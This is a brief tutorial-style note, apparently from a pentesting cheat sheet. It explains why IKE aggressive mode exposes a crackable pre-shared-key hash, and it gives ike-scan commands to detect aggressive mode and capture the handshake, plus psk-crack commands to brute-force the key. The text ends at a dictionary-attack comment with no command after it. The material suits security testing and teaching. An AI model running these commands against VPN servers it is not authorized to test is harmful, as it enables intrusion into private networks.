Exploiting IKE Aggressive Mode

In IKE aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted (in main mode the hash is encrypted)

The ike-scan tool can be used to test if an IPSEC VPN server is using IKE in aggressive mode:

sudo ike-scan -A $IP_ADDRESS

If aggressive mode is in use, then ike-scan can be used to save the initial exchange for offline cracking:

sudo ike-scan -A $IP_ADDRESS --id=$ID -P$KEY_FILE

psk-crack can then be used to (attempt) to crack the resulting $KEY_FILE.

# Attempt to brute-force all keys up to $KEY_LENGTH using
# characters from $CHARSET (by default $CHARSET is numbers and
# lowercase ASCII characters).
psk-crack --charset="$CHARSET" -b $KEY_LENGTH $KEY_FILE

# Attempt to crack the PSK using a dictionary.